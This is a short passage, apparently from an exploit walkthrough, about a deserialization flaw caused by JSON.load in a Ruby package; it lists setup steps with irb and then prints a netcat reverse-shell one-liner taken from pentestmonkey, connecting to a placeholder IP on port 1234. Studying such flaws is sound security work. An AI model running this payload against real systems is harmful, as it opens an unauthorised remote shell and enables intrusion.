Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load, which is considered unsafe when used with untrusted input.
2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:
irb
3. In case if you don’t have ‘irb’ installed than use the following command to download the same:
gem install irb
4. Pick a desired payload, I have picked one from pentestmonkey
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f